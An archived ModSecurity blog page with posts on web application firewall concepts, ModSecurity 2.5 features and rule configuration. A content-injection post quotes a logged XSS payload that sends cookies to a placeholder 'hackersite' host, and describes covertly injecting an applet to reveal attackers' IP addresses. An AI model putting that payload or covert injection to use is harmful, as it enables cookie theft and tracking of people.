The Wayback Machine - https://web.archive.org/web/20081220173518/http://www.modsecurity.org:80/blog/
This blog has moved! Please update your
bookmarks to http://www.blog.modsecurity.org.

Web Application Monitoring Data Model

A data model is the foundation of web application monitoring and, thus, key to successful utilisation of web application firewalls. We don't get to design the model; we can only deduct it from the information provided to us from the underlying technology. What we can do is build on it, and, for that reason, it is very important to understand what we have to work with.

An ideal model is one that helps structure the information available to us, allows us to enrich it with additional pieces of data and generally helps us raise events based on the information it contains.

The major parts of a web application monitoring data model are as follows:

  • Connection - corresponds to one TCP connection.
  • Request - corresponds to one HTTP request.
  • Response - corresponds to one HTTP response.
  • IP Address - the IP address of the client, retrieved from the TCP connection.
  • Session - application session.
  • User - authenticated user; in most cases this translates to the application user, but some sites still use HTTP authentication, and some might use both.
  • Site - perhaps more accurately called Protection domain, or Application. None of these terms is perfect, but I generally prefer to use Site. In our model, Site refers either to the functionality behind an entire domain name (e.g. www.example.com), or only a subset of one (www.example.com/forums/).
  • Country - the country where the request originates.
  • City - the city where the request originates.
  • Custom - any number of custom attributes. For example, you might want to have different policies for different departments within your organisation. To achieve this, you will map client IP addresses to department names, which you will then use to determine policies.

Most of the components are easy to construct, mapping from the structures used in programming, but there are a few places where the technology does not support the view, or where what we are given is not what we want to see:

  • Some work is needed to be able to distinguish sessions. There are different session identifier techniques to consider (e.g. in the URI, in a parameter, in a cookie). While there is a number of platforms that have standardised session management, there is also a large number of applications using their own schemes, so in general some custom work will be needed.
  • More so in the case of user identification. Building on session identification one needs to identify a successful login event in the traffic in order to determine the session username.
  • The IP address may not be accurate. It may be that of an intermediary, and not of the client itself. Such cases can sometimes be identified (as is the case with HTTP proxies) , but not always (e.g. if a transparent HTTP proxy is used). The problem is that, unless you control the proxy, you can only rely on the IP address you got from the TCP stack; the information extracted from HTTP requests headers is not to be trusted.

Note: This post is part of the Web Application Firewall Concepts series.

 

Web Application Firewall Use Case: Continuous Security Assessment

After some deliberation, I have decided to add Continuous security assessment as a standalone item on my web application firewall use cases list. Although some could argue the functionality is already covered in the Web intrusion detection and prevention section, it is not obvious—you have to understand this field in order to know it is there.

Continuous security assessment is not specific to web application firewalls—it's been used for the network layer for years—but web application firewalls are more useful for web applications (than IDS tools are for network applications), simply because there's essentially one data format to analyse (if you can call a bunch of loosely related specifications used by web applications "one" data format). With web applications, you get to see clear picture of application input and output. Therefore, with proper parsing and analysis in place, it's almost like having a direct communication channel with the application itself.

The focus here is not on the attacks and other suspicious client behaviour, which comes out of the stock IDS/IPS functionality, but on everything else:

  • application defects,
  • information leakage,
  • configuration errors,
  • change control

and so on. The advantage is that you can detect some very subtle issues, only possible because of the depth of analysis.

Just as an extreme example, there are quite a few web applications out there where SQL injection (less often) and XSS (surprisingly common) exist by design—their clients are allowed and expected to send such low-level stuff and have it executed by the server. These types of problem can be detected early and with little effort, and because assessment never stops, you get the alert as soon as they are manifested.

Note: This post is part of the Web Application Firewall Concepts series.

 

Web Application Firewall Use Cases

There are many reasons to use a web application firewall. Most people tend to focus on prevention and blocking when the term is brought up, but that is just one of the possible uses. Three years ago, almost to the day, I wrote this post to argue how one needs a WAF to serve as a part of the overall defence strategy. My opinion remains unchanged today, but I have since expanded the list of use cases for web application firewalls. Here they are:

  1. Web intrusion detection and prevention. Applying the principles of external traffic monitoring (IDS) and prevention (IPS) to HTTP and the related technologies, which are used to build web applications. Through your WAF you will look for signs of generic web application attacks (negative security model), or deploy a learning engine to construct a model of your site and reject all invalid traffic, not just attacks (also known as positive security model).
  2. Continuous security assessment. The idea with this case is to emphasize the fact web application firewalls actually understand web applications pretty well. Armed with this knowledge, they can do more than detect attacks; they can observe from signs of weaknesses, information leaks, configuration errors, and similar problems before an attempt to exploit them is made.
  3. Virtual (or just-in-time) patching. When you need to deal with a specific problem in your web site, which exists either in your code or in the code of the product you are relying on. The focus in this use case is on writing custom rules to deal with custom issues.
  4. HTTP traffic logging and monitoring. Do you know what is actually going on in your web applications? Who are your users and how are they using your systems? Are you being attacked and how?
  5. Network building blocks. This use case is not often a primary motivator for WAF deployment, but if you're already deploying a reverse proxy to serve as a HTTP switch/router, making the device security-aware is the way to go.
  6. Web application hardening. If you deploy your WAF as a reverse proxy then you can get it to modify the traffic stream to fix some of the design faults of your application or the HTTP protocol.

I will expand on each use case in my future posts.

Note: This post is part of the Web Application Firewall Concepts series.

 

Web Application Firewall Concepts

I went through all my ModSecurity Blog posts yesterday, partly to admire myself for blogging consistently for almost 5 years and partly to understand what is that I talked about during this time. While I knew that most of my posts were pretty technical (after all, I did start my new blog to focus on other things) imagine my surprise when I realised I didn't properly cover the one thing this blog is supposed to cover: web application firewalls! The emphasize is on the word "properly": I provided a great deal of technical information but not enough content that would explain why one would deploy a web application firewall and how. This stuff had went into my conference talks and the Web Application Firewall Evaluation Criteria project, but I forgot to discuss the topics here.

In an effort to fix this I am starting a series of blog posts called Web Application Firewall Concepts. Each post will be reasonably brief and cover one aspect of the technology, and I will continually update this post to serve as a table of contents.

Posts in this series:

  1. Use Cases
    1. Web intrusion detection and prevention
    2. Continuous Security Assessment
    3. Virtual (or just-in-time) patching
    4. HTTP traffic logging and monitoring
    5. Network building blocks
    6. Web application hardening
  2. Deployment models
    1. Inline
    2. Out of line
    3. Embedded
  3. Data Model
    1. Model construction
    2. Persisting information across requests
    3. Distinguishing sessions
    4. Distinguishing users
  4. Analysis Model
    1. Negative security
    2. Positive security
    3. Anomaly scoring
    4. Learning
    5. Evasion
    6. Impedance mismatch
  5. Traffic logging
  6. Special protection techniques
    1. Cookie protection
    2. Cross-Site Request Forgery
    3. Brute force attacks
    4. Denial of Service attacks
    5. PDF UXSS protection

 

ModSecurity User Survey

With the release of ModSecurity 2.5 yesterday, this seemed like the perfect time to get feedback from the user community. The 2.5 release is important as it has included many features that were identified by the user community, so this highlights the need for us (Breach) to have a full understanding of how people are using ModSecurity and any challenges you all are facing.

With this in mind, we have put together the first ModSecurity User Survey.

I urge everyone to please take about 5 minutes and fill out the survey. With this information, we will be able to map out areas where we need to focus research and development to both the ModSecurity code itself, but also with the rule sets and supporting tools.

We will leave the survey open until the end of March.

Thanks for your time everyone.

 

ModSecurity 2.5 Released

The final version of ModSecurity 2.5.0, the long awaited next stable version of ModSecurity, is now available. This release offers quite a few new features: set-based matching, a wider variety of string matching operators, transformation caching, support for writing rules as Lua scripts, credit card number validation, enhanced means for maintaining and customizing third party rulesets, and quite a few other features. Take a look at the main website to see a summary of the new features.

Getting ModSecurity

As always, send questions/comments to the community support mailing list. You can download the latest releases, view the documentation and subscribe to the mailing list at www.modsecurity.org.

Building ModSecurity 2.5

The documentation has been updated with a new build process for 2.5. The new process uses the typical 'configure', 'make' and 'make install' approach instead of having to hand edit a Makefile as in previous releases. This approach allows for a generally easy build for those with libraries in standard locations, but also some flexibility for those with unique systems. You can take a look at more details in the installation section of the documentation.

 

Web Hacking Incidents Database Annual Report for 2007

Breach Labs which sponsors WHID has issued an analysis of the Web Hacking landscape in 2007 based on the incidents recorded at WHID. It took some time as we added the new attributes introduced lately to all 2007 incidents and mined the data to find the juicy stuff:

  • The drivers, business or other, behind Web hacking.
  • The vulnerabilities hackers exploit.
  • The types of organizations attacked most often.

To be able to answer those questions, WHID tracks the following key attributes for each incident:

  • Attack Method - The technical vulnerability exploited by the attacker to perform the hack.
  • Outcome - the real-world result of the attack.
  • Country - the country in which the attacked web site (or owning organization) resides.
  • Origin - the country from which the attack was launched.
  • Vertical - the field of operation of the organization that was attacked.
Key findings were:
  • 67% percent of the attacks in 2007 were "for profit" motivated. Ideological hacking came second.
  • With 20%, good old SQL injections dominated as the most common techniques used in the attacks. XSS finished 4th with 12 percent and the young and promising CSRF is still only seldom exploited out there and was included in the "others" group.
  • Over 44% percent of incidents were tied to non-commercial sites such as Government and Education. We assume that this is partially because incidents happen more in these organizations and partially because these organizations are more inclined to report attacks.
  • On the commercial side, internet-related organizations top the list. This group includes retail shops, comprising mostly e-commerce sites, media companies and pure internet services such as search engines and service providers. It seems that these companies do not compensate for the higher exposure they incur, with proper security procedures.
  • In incidents where records leaked or where stolen the average number of records affected was 6,000.
The full report can be found at Breach Security Network.

 

Tangible ROI of a Web Application Firewall (WAF)

One of the challenges facing organizations that need to increase the security of their web applications is to concretely provide appropriate "Return On Investment" (ROI) for procurement justification. Organizations can only allocate a finite amount of budget towards security efforts therefore security managers need to be able to justify any commercial services, tools and appliances they want to deploy. As most people who have worked in information security for an extended period of time know, producing tangible ROI for security efforts that address business driver needs is both quite challenging and critically important.

The challenge for security managers is to not focus on the technical intricacies of the latest complex web application vulnerability or attack. C-level Executives do not have the time, and in most instances the desire, to know the nuances of an HTTP Request Smuggling attack. That is what they are paying you for! Security managers need to function as a type of liaison where they can take data from the Subject Matter Experts (SMEs) and then translate that into a business value that is important to the C-level Executive.

One, almost guaranteed, pain point to most executives are vulnerability scan reports that are presented by auditors. The auditors are usually being brought in from and reporting to a higher-level third party (be it OMB in the Government or PCI for Retail). Executives like to see "clean vulnerability scan reports." While this will certainly not guarantee that your web application is 100% secure, it can certainly help to prove the counter-argument. And to make matters worse, nothing is more frustrating to upper Management than auditor reports list repeat vulnerabilities that either never go away or pull the "Houdini" trick (they disappear for awhile only to suddenly reappear). Sidebar - see Jeremiah Grossman's Blog post for examples of this phenomenon. These situations are usually attributed to breakdowns in the Software Development Life Cycle (SDLC) where code updates are too time consuming or the change control processes are poor.

This is one of the best examples of where a Web Application Firewall can prove its ROI.

At Breach Security, we receive many inbound calls from prospects who are interested in WAF technology but are lacking that "Big Stick" that helps convince upper management to actually make the purchase. The best scenario we have found is to suggest a "Before and After" comparison of a vulnerability scan report while they are testing the WAF on their network. The idea is to deploy the WAF in block mode and then initiate a rescan of a protected site. The difference in the reduction of findings is an immediate, quantitative ROI.

Here is a real example. One of our current customers followed this exact roadmap and this is a summary (slightly edited to remove sensitive information) of the information they sent back to us:

Our WAF is installed and running. I have tested its impact on www.example.com and it is operating very admirably. This morning I had the vulnerability scanning team run an on-demand scan to test the efficacy of the appliance, and I was very impressed with the results. Our previous metrics for www.example.com in the last scan were 64 vulnerabilities, across all outside IP addresses (including www.example.com, example2.com, example3.com, etc.) and with the Breach appliance in place, the metric from today's scan was 5 vulnerabilities, with details:

- High vulnerabilities dropped from 38 to 0
- Medium vulnerabilities dropped from 12 to 0
- 1 low vulnerability remains due to simply running a web server (we will eliminate this via exception)
- 1 low vulnerability due to a file/folder naming convention that is typical and attracts unwanted attacks (will be eliminated via rule addition)

Bear in mind that I have applied the appliance with a basic (almost strictly out-of-the-box) configuration and ruleset to protect only www.example.com (192.168.1.100 in the report), and the 35 warnings that remain are for the other websites, and would similarly disappear when protected by the appliance. In my opinion, this was a very successful test that indicates the effectiveness of the appliance.

So, looking at the report after the WAF was in place, the www.example.com web site removed 38 high and 12 medium vulnerabilities and left only 2 low ones (which are really just informational notices). That is pretty darn good and that was just with the default, generic detection ModSecurity rule set! Hopefully this information has helped to provide a possible use-case testing scenario to show tangible ROI of a WAF.

In a future post, I will discuss how custom WAF rule sets can be implemented to address more complex vulnerability issues identified not by a scanner but by actual people who have performed a web assessment/pentest.

 

Is Your Website Secure? Prove It.

The recent Geeks.com compromise and subsequent articles have created a perfect storm of discussion topics and concerns related to web security. The underlying theme is that true web security encompasses much more than a Nessus scan from an external company.

The concepts (and much of the text) in this post are taken directly from a blog post by Richard Bejtlich on his TaoSecurity site. I have simply tailored the concepts specifically to web security. Thanks goes to Richard for always posting thought provoking items and making me look at web security through a different set of eyes. You know what they say about imitation ;)

The title of this post form the core of most of my recent thinking on web application security. Since I work for a commercial web application firewall company and am the ModSecurity Community Manager, I often get the chance to talk with people about web application security. While I am not a "sales" guy, I do hang out at our vendor booth when we are at conferences. I am mainly there to field technical questions and just interact with people. I have found that the title of this post is actually one of the absolute best questions to ask someone when they first come up to our booth. It always sparks interesting conversation and can shed light onto specific areas of strength and weakness.

What does it mean to be secure?

Obviously having logos posted on a web site that tout "we are secure" is really just a marketing tactic aimed to re-assure potential customer that it is safe to purchase goods at their site. The reality is that these logos are non-reliable and make no guarantee as to the real level of security offered by the web site. At best, they are an indication that the web site has met some sort of minimum standard. But that is a far cry from actually being secure.

Let me expand "secure" to mean the definition Richard provided in his first book: Security is the process of maintaining an acceptable level of perceived risk. He defined risk as the probability of suffering harm or loss. You could expand my six word question into are you operating a process that maintains an acceptable level of perceived risk for your web application?

Let's review some of the answers you might hear to this question. I'll give an opinion regarding the utility of the answer as well. For the purpose of this exercise let's assume it is possible to answer "yes" to this question. In other words, we just don't answer "no." We could all make arguments as to why it's impossible to be secure, but does that really mean there is no acceptable level of perceived risk in which you could operate? I doubt it. Let's take a look at the varios levels of responses.

So, is your website secure? Prove it.

1. Yes.

Then, crickets (i.e., silence for you non-imaginative folks.) This is completely unacceptable. The failure to provide any kind of proof is security by belief. We want security by fact. Think of it this way, would auditors accept this answer? Could you pass a PCI Audit by simply responding yeah, we are secure. Nope, you need to provide evidence.

2. Yes, we have product X, Y, Z, etc. deployed.

This is better, but it's another expression of belief and not fact. The only fact here is that technologies can be abused, subverted, and broken. Technologies can be simultaneously effective against one attack model and completely worthless against another.

This also reminds me of another common response I hear and that is - yes, we are secure because we use SSL. Ugh... Let me share with you one personal experience that I had with an "SSL Secured" website. Awhile back, I decided to make an online purchase of some herbal packs that can be heated in the microwave and used to treat sore muscles. When I visited the manufacturer's web site, I was dutifully greeted with a message "We are a secure web site! We use 128-bit SSL Encryption." This was reassuring as I obviously did not want to send my credit card number to them in clear text. During my checkout process, I decided to verify some general SSL info about the connection. I double-clicked on the "lock" in the lower-right hand corner of my web browser and verified that the domain name associated with the SSL certificate matched the URL domain that I was visiting, that it was signed by a reputable Certificate Authority such as VeriSign, and, finally, that the certificate was still valid. Everything seemed in order so I proceeded with the checkout process and entered my credit card data. I hit the submit button and was then presented with a message that made my stomach tighten up. The message is displayed next; however, I have edited some of the information to obscure both the company and my credit card data.

The following email message was sent:

To:companyname@aol.com
From: RCBarnett@email.com
Subject:ONLINE HERBPACK!!!
name: Ryan Barnett
address: 1234 Someplace Ct.
city: Someplace
state: State
zip: 12345
phone#:
Type of card: American Express
name on card: Ryan Barnett
card number: 123456789012345
expiration date: 11/05
number of basics:
Number of eyepillows:
Number of neckrings: 1
number of belted: 1
number of jumbo packs:
number of foot warmers: 1
number of knee wraps:
number of wrist wraps:
number of keyboard packs:
number of shoulder wrap-s:
number of cool downz:
number of hats-black:         number of hats-gray:
number of hats-navy:         number of hats-red:
number of hats-rtcamo:         number of hats-orange:
do you want it shipped to a friend:
name:
their address:
their city:
their state:
their zip:
  
cgiemail 1.6

I could not believe it. It looked as though they had sent out my credit card data in clear-text to an AOL email account. How could this be? They were obviously technically savvy enough to understand the need to use SSL encryption when clients submitted their data to their web site. How could they then not provide the same due diligence on the back-end of the process?

I was hoping that I was somehow mistaken. I saw a banner message at the end of the screen that indicated that the application used to process this order was called "cgiemail 1.6." I therefore hopped on Google and tried to track down the details of this application. I found a hit in Google that linked to the cgiemail webmaster guide. I quickly reviewed the contents and found what I was looking for in the "What security issues are there?" section:

Interception of network data sent from browser to server or vice versa via network eavesdropping. Eavesdroppers can operate from any point on the pathway between browser and server.

Risk: With cgiemail as with any form-to-mail program, eavesdroppers can also operate on any point on the pathway between the web server and the end reader of the mail. Since there is no encryption built into cgiemail, it is not recommended for confidential information such as credit card numbers.

Shoot, just as I suspected. I then spent the rest of the day contacting my credit card company about possible information disclosure and to place a watch on my account. I also contacted the company by sending an email to the same AOL address outlining the security issues that they needed to deal with. To summarize this story: Use of SSL does not a "secure site" make.

3. Yes, we are PCI compliant.

Generally speaking, regulatory compliance is usually a check-box paperwork exercise whose controls lag attack models of the day by one to five years, if not more. PCI is somewhat of an exception as it attempts to be more operationally relevant and address more current web application security issues. While there are some admirable aspects of PCI, please keep this mantra in mind -

It is much easier to pass a PCI audit if you are secure than to be secure because you pass a PCI audit.

PCI, like most other regulations, are a minimum standard of due care and passing the audit does make your site "unhackable." A compliant enterprise is like feeling an ocean liner is secure because it left dry dock with life boats and jackets. If regulatory compliance is more than a paperwork self-survey, we approach the realm of real of evidence. However, I have not seen any compliance assessments which measure anything of operational relevance. Check out Richard's Blog posts on Control-Compliant security for more details on this concept and why it is inadequate. What we really need is more of a "Field-Assessed" mode of evaluation. I will discuss this concept more in depth in future Blog posts.

4. Yes, we have logs indicating we prevented web attacks X, Y, and Z (SQL Injection, XSS, etc...).

This is getting close to the right answer, but it's still inadequate. For the first time we have some real evidence (logs) but these will probably not provide the whole picture. I believe that how people deploy and use a WAF is critical. Most people deploy a WAF in an "alert-centric" configuration which will only provide logs when a rule matches. Sure, these alert logs indicate what was identified and potentially stopped, but what about activities that were allowed? Were they all normal, or were some malicious but unrecognized by the preventative mechanism? Deploying a WAF as an HTTP level auditing device is a highly under-utilized deployment option. There is a great old quote that sums up this concept -

"In an incident, if you don't have good logs (i.e. auditing), you'd better have good luck."

5. Yes, we do not have any indications that our web applications are acting outside their expected usage patterns.

Some would call this rationale the definition of security. Whether or not this answer is acceptable depends on the nature of the indications. If you have no indications because you are not monitoring anything, then this excuse is hollow. If you have no indications and you comprehensively track the state of a web application, then we are making real progress. That leads to the penultimate answer, which is very close to ideal.

6. Yes, we do not have any indications that our web applications are acting outside their expected usage patterns, and we thoroughly collect, analyze, and escalate a variety of network-, host-, and web application-based evidence for signs of violations.

This is really close to the correct answer. The absence of indications of intrusion is only significant if you have some assurance that you've properly instrumented and understood the web application. You must have trustworthy monitoring systems in order to trust that a web application is "secure." The lack of robust audit logs is usually the reason why organizations can not provide this answer. Put it this way, Common Log Format (CLF) logs are not adequate for full web based incident responst. Too much data is missing. If this is really close, why isn't it correct?

7. Yes, we do not have any indications that our web applications are acting outside their expected usage patterns, and we thoroughly collect, analyze, and escalate a variety of network-, host-, and web application-based evidence for signs of violations. We regularly test our detection and response people, processes, and tools against external adversary simulations that match or exceed the capabilities and intentions of the parties attacking our enterprise (i.e., the threat).

Here you see the reason why number 6 was insufficient. If you assumed that number 6 was OK, you forgot to ensure that your operations were up to the task of detecting and responding to intrusions. Periodically you must benchmark your perceived effectiveness against a neutral third party in an operational exercise (a "red team" event). A final assumption inherent in all seven answers is that you know the assets you are trying to secure, which is no mean feat. Think of this practical exercise, if you run a zero-knowledge (meaning un-announced to operations staff) web application penetration test, how does your organization respond? Do they even notice the penetration attempts? Do they report it through the proper escalation procedures? How long does it take before additional preventative measures are employed? Without answers to this type of "live" simulation, you will never truly know if your monitoring and defensive mechanisms are working.

Conclusion

Indirectly, this post also explains why only doing one of the following: web vulnerability scanning, penetration testing, deploying a web application firewall and log analysis does not adequately ensure "security." While each of these tasks excel in some areas and aid in the overall security of a website, they are each also ineffective in other areas. It is the overall coordination of these efforts that will provide organizations with, as Richard would say, a truly "defensible web application."

 

ModSecurity 2.5 Status

The ModSecurity 2.5 release is scheduled for early/mid February. With the ModSecurity 2.5 release just around the bend, I have been spending my time doing a lot of testing, tweaking and polishing. I would like ModSecurity 2.5 and the core rule set (or any of the commercial rule sets Breach offers) to be easier to integrate into your environment. Ofer Shezaf and Avi Aminov are hard at work developing and tuning the core rule sets. Along with this comes requests from them for features to make integration and configuration easier. Because of this, I have included a few new features in ModSecurity 2.5 to make things easier for rule set authors. What this means is that it is time for the next release candidate of ModSecurity 2.5, 2.5.0-rc2. This release focuses primarily on making generic rule sets (such as the core rule set) easier to configure and customize for your sites.

Taming the Rule Set

ModSecurity does not give you much without a good rule set. However, good rule sets are time consuming to develop and require a lot of testing and tuning. More people benefit from a generic rule set, but these can be time consuming to customize for your sites while still allowing an easy upgrade path when new rule sets are released. For those of you who keep track of the community mailing list, you have undoubtedly seen the many false positive comments and requests for help getting generic rules to fit in a custom environment. A generic rule set will not work for everyone out of the box and will need to be tailored to fit. But tailoring can mean local modifications. And that may mean a lot of extra time spent retesting and reapplying modifications when it comes time to upgrade the rule set. Ryan Barnett has some excellent articles on how to deal with modifying a rule set in the least intrusive manner. However, I want to introduce some new functionality I have added to ModSecurity 2.5 to help deal with customizing rule sets without actually touching the rules -- making upgrades easier and require less time.

One of the biggest concerns over a generic third party rule set is that of policy. To block or not to block, that is the question. Some installers preferred just logging, others blocking via HTTP 403, some via HTTP 500, others preferred dropping the connection altogether with a TCP reset. In past versions of ModSecurity, this usually meant rule set authors had to include two versions of their rules, one for logging only and another for blocking. If this was not done, then the rule set installer would have to manually change all the actions in a rule set if not to the installer's liking. With ModSecurity 2.5, this blocking decision can now more easily be that of the rule set installer instead of the rule set author.

A new "block" action has been added to ModSecurity 2.5 to allow a rule set to specify where blocking is intended, but not actually specifying how to perform the blocking. The how is left up to the rule set installer, including the choice of not blocking at all. Currently this is done via inheritance (existing SecDefaultAction directive), but is also enhanced via the new SecRuleUpdateActionById directive. Future versions of ModSecurity will make this even more flexible.

Take the following rule set as an example. This will deny and log any request not a GET, POST or HEAD. So, things like PUT, TRACE, etc. will be denied with an HTTP 500 status even though the installer specified a default of "pass".

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "phase:1,t:none,deny,status:500"

With the new "block" action, this could be rewritten as in the following example. In this example the blocking action is, well, not to block ("pass" specified in the SecDefaultAction). This could easily be changed by the installer to "deny,status:501", "drop", "redirect:http://www.example.tld/", etc. The important thing to note here is that the installer is making the choice, not the rule set author.

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "phase:1,t:none,block"

So now some of you are (or maybe should be) questioning how this new "block" action differs from just not explicitly specifying a disruptive action in the rule to begin with and just letting the inheritance work as designed. Well, there is not really that much different at first glance. The named action is a little bit cleaner to read, but there are really two main differences. The first is that future versions of ModSecurity can expand on how you define and customize "block" in more detail. The second reason lies in what "block" is doing. It is explicitly reverting back to the default disruptive action, which leads into the next new feature.

Let me start off with another example (okay, it is the same example, but it is easy to follow). Below, there is no way to change the disruptive action other than editing the third party rule in place or replacing the rule with a local copy. The latter is better for maintenance, but it means keeping a local copy of the rule around which may require maintenance during a rule set upgrade.

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "id:1,phase:1,t:none,deny,status:500"

# Replace with a local copy of the rule
SecRuleRemoveById 1
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "id:1,phase:1,t:none,pass"

With ModSecurity 2.5, you can instead update the action to make it do something else. This is done via the new SecRuleUpdateActionById directive. It has the added benefit where if the third party rule set is upgraded later on (provided the id is the same, which it should be - hint) there is no editing required for the local copy of the customization. In fact, there is no local copy to edit at all.

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "id:1,phase:1,t:none,deny,status:500"

# Update the default action explicitly
SecRuleUpdateActionById 1 "pass"

You should notice in the last example that what I did was to change the third party rule back to what I originally specified in the SecDefaultAction. If only there was a way to just tell the rule to use the default. This is where the second reason for "block" comes into play (thought I forgot about that, eh). Instead of explicitly specifying the disruptive action, you can just specify it as "block" and it will instead force the rule to revert back to the last default action. In this example that is a "pass". This is just as if the rule author had specified "block" instead of "deny".

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "id:1,phase:1,t:none,deny,status:500"

# Revert the rule back to the default disruptive action, "pass"
SecRuleUpdateActionById 1 "block"

The new SecRuleUpdateActionById directive is not limited to only disruptive actions. You can update nearly any action. The only imposed limit is that you may not change the ID of a rule. However, some care should be taken for actions that are additive (transformations, ctl, setvar, etc.) as these actions are not replaced, but appended to. For transformations, however, you can "replace" the entire transformation chain by specifying "t:none" as the first transformation in the update (just as you would when inheriting from SecDefaultAction).

New Build Method and Automated Tests

Another big change in this release is the build process. ModSecurity 2.5 is now built with a more automated method. No more editing a Makefile. Instead, a configure script was added to automate the creation of a Makefile by searching for the location of all dependencies. Additionally, I added a number of automated tests to ensure operators and transformations are working as expected (executed via "make test").

# Typical build proceedure is now:
./configure
make
make test
sudo make install

Other Notable Changes in this Release

There are a few other minor additions and changes in this second release candidate as well.

  • The mlogc tool is now included with the ModSecurity 2.5 source.
  • To help reduce assumptions, the default action is now a minimal "phase:2,log,pass" with no default transformations performed.
  • A new SecUploadFileMode directive is available to explicitly set the file permissions for uploaded files. This allows easier integration with external analysis software (virus checkers, etc.).
  • To help reduce the risk of logging sensitive data, the query string is no longer logged in the error log.
  • Miscellaneous fixes for removing rules via SecRuleRemoveBy* directives.

How You Can Help

As you can see there are a lot of new features and enhancements in ModSecurity 2.5. I hope to see some good feedback from the release candidates so that we can get ModSecurity 2.5 polished up and the stable 2.5.0 available as soon as possible. Installing and testing in your environment is a great help, but there are other ways you can help.

  • Read through and give suggestions for improvements to the documentation.
  • Run through the new build/install procedure and give suggestions on how it can be improved.
  • Tell us how you are using ModSecurity and where your biggest challenges are and where you might be hitting limitations.

Getting ModSecurity

As always, send questions/comments to the community support mailing list. You can download the latest releases, view the documentation and subscribe to the mailing list at www.modsecurity.org.

 

Content Injection Use Case Example

ModSecurity 2.5 introduces a really cool, yet somewhat obscure feature called Content Injection. The concept is pretty interesting as it allows you to inject any text data that you want into the response bodies of your web application.

Identifying Real IP Addresses of Web Attackers

One of the biggest challenges of doing incident response during web attacks is to try and trace back the source IP address information to identify the "real" attacker's computer. The reason why this is so challenging is that attackers almost always loop their attacks through numerous open proxy servers or other compromised hosts where they setup connection tunnels. This means that the actual IP address that shows up in the victims logs is most likely only the last hop in between the attacker and the target site. One way to try and tackle this problem is instead of relying on the TCP-IP address information of the connection, we attempt to handle this at the HTTP layer.

Web security researches (such as Jeremiah Grossman) have conducted quite a bit research in area of how blackhats can send malicious javascript/java to clients. Once the code executes, it can obtain the client's real (internal NAT) IP address. With this information, the javascript code can do all sorts of interesting stuff such as port scan the internal network. In our scenario, the client is not an innocent victim but instead a malicious client who is attacking our site. The idea is that this code that we send to the client will execute locally, grab their real IP address and then post the data back to a URL location on our site. With this data, we can then perhaps initiate a brand new incident response engagement focusing in on the actual origin of the attacks!

The following rule uses the same data as the previous example, except this time, instead of simply sending an alert pop-up box we are sending the MyAddress.class java applet. This code will force the attacker's browser to initiate a connection back to our web server.

SecRule TX:ALERT "@eq 1" "phase:3,nolog,pass,chain,prepend:'<APPLET CODE=\"MyAddress.class\" MAYSCRIPT WIDTH=0 HEIGHT=0>
<PARAM NAME=\"URL\" VALUE=\"grab_ip.php?IP=\">
<PARAM NAME=\"ACTION\" VALUE=\"AUTO\"></APPLET>'" 
SecRule RESPONSE_CONTENT_TYPE "^text/html"

So, if an attacker sends a malicious request that ModSecurity triggers on, this rule will then fire and it will send the injected code to the client. Our Apache access_logs will show data similar to this:

203.160.1.47 - - [20/Jan/2008:21:15:03 -0500] "GET /cgi-bin/foo.cgi?param=<script>document.write('<img%20
src="http://hackersite/'+document.cookie+'"')</script> HTTP/1.1" 500 676 
203.160.1.47 - - [20/Jan/2008:21:15:03 -0500] "GET /cgi-bin/grab_ip.php?IP=222.141.50.175 HTTP/1.1" 404 207

As you can see, even though the IP address in the access_logs shows 203.160.1.47, the data returned in the QUERY_STRING portion of the second line shows that the real IP address of the attacker is 222.141.50.175. This would mean that in this case, the attacker's system was not on a private network (perhaps just connecting their computer directly to the internet). In this case, you would be able to obtain the actual IP of an attacker who was conducting a manual attack with a browser.

Attacker -> Proxy -> ... -> Proxy -> Target Website.
    ^                         ^
222.141.50.175           203.160.1.47

Caveats

Internal LAN

This example is extremely experimental. As the previous section indicates, if the attacker were behind a router (on a private LAN) then the address range would have probably been in the 192.169.xxx.xxx range.

Attacker -> Firewall/Router -> ... -> Proxy -> Target Website.
    ^                                   ^
192.168.1.100                      203.160.1.47

This type of data would not be as useful for our purposes as it wouldn't help for a traceback.

Non-Browser Clients

Since a majority of web attacks are automated, odds are that the application that is sending the exploit payload is not actually a browser but rather some sort of scripting client. This would mean that the javascript/java code would not actually execute.

Conclusion

Hopefully you can now see the potential power of the content injection capability in ModSecurity. The goal of this post was to get you thinking about the possibilities. For other ideas on the interesting types of javascript that we could inject, check out PDP's AttackAPI Atom database. ModSecurity will eventually expand this functionality to allow for injecting content at specific locations of a response body instead of just at the beginnin or at the end.

 

Yes, the Tide for Web Application Firewalls is Turning

Some time ago I decided to start a new blog, a place where I would be able to address the topics that are not ModSecurity specific. I felt the ModSecurity Blog has its purpose and a happy audience; I didn't want for it to lose the focus. Today I made my first proper post at this new blog:

"There is a long-running tradition in the web application firewall space; every year we say: "This year is going to be the one when web application firewalls take off!" So far, every year turned out to be a bit of a disappointment in this respect. This year feels different, and I am not saying this because it's a tradition to do so. Recent months have seen a steady and significant rise in the interest in and the recognition of web application firewalls. But why is it taking so long?

To read more please continue to "Tide is turning for web application firewalls".

 

ModSecurity Data Formats

I have just added a new section to the ModSecurity v2.5 Reference Manual, describing the data formats we use. Nothing spectacular, I know, but it is always nice when things get written down.

Alerts

Below is an example of a ModSecurity alert entry. It is always contained on a single line but we've broken it here into multiple lines for readability.

Access denied with code 505 (phase 1). Match of "rx ^HTTP/(0\\\\.9|1\\\\.[01])$"
against "REQUEST_PROTOCOL" required. [id "960034"] [msg "HTTP protocol version
is not allowed by policy"] [severity "CRITICAL"] [uri "/"] [unique_id
"PQaTTVBEUOkAAFwKXrYAAAAM"]

Each alert entry begins with the engine message:

Access denied with code 505 (phase 1). Match of "rx ^HTTP/(0\\\\.9|1\\\\.[01])$"
against "REQUEST_PROTOCOL" required.

